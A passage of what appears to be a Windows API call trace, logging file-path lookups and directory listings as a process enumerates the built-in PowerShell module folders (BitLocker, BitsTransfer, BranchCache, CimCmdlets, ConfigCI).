lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0332.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x4c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0332.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.149] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x240b9f0 | out: lpFileInformation=0x240b9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdb23cad3, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x31ac7f1c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6ea)) returned 1 [0332.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0332.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0332.150] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89aaa0 [0332.150] FindNextFileW (in: hFindFile=0x1a89aaa0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.150] FindNextFileW (in: hFindFile=0x1a89aaa0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x359c88a6, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1c32, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0332.151] FindNextFileW (in: hFindFile=0x1a89aaa0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf747fb77, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0332.151] FindNextFileW (in: hFindFile=0x1a89aaa0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x359c88a6, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0332.151] FindNextFileW (in: hFindFile=0x1a89aaa0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x359c88a6, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0332.151] FindClose (in: hFindFile=0x1a89aaa0 | out: hFindFile=0x1a89aaa0) returned 1 [0332.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.151] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0332.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0332.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0332.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0332.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0332.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x240c198 | out: lpFileInformation=0x240c198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdb2d54f1, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x644)) returned 1 [0332.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0332.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x3f, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0332.153] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a4a0 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1401f1d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x1401f1d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf747fb77, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1401f1d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x1401f1d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26be2b07, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26be2b07, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26be2b07, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26be2b07, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1401f1d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x1401f1d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0332.153] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0332.154] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0332.154] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0332.154] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0332.154] FindNextFileW (in: hFindFile=0x1a89a4a0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 0 [0332.154] FindClose (in: hFindFile=0x1a89a4a0 | out: hFindFile=0x1a89a4a0) returned 1 [0332.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.154] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20 [0332.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0332.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0332.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0332.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0332.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.155] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1"), fInfoLevelId=0x0, lpFileInformation=0x240c908 | out: lpFileInformation=0x240c908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdb2d54f1, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6cb)) returned 1 [0332.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0332.156] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a260 [0332.156] FindNextFileW (in: hFindFile=0x1a89a260, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.156] FindNextFileW (in: hFindFile=0x1a89a260, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359ed026, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf747fb77, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x359ed026, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0332.156] FindNextFileW (in: hFindFile=0x1a89a260, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359ed026, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf747fb77, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x359ed026, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0332.156] FindClose (in: hFindFile=0x1a89a260 | out: hFindFile=0x1a89a260) returned 1 [0332.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.157] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0332.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0332.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0332.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0332.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0332.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), fInfoLevelId=0x0, lpFileInformation=0x240d050 | out: lpFileInformation=0x240d050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359ed026, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdd39d840, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x359ed026, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x760)) returned 1 [0332.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0332.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", nBufferLength=0x3c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", lpFilePart=0x0) returned 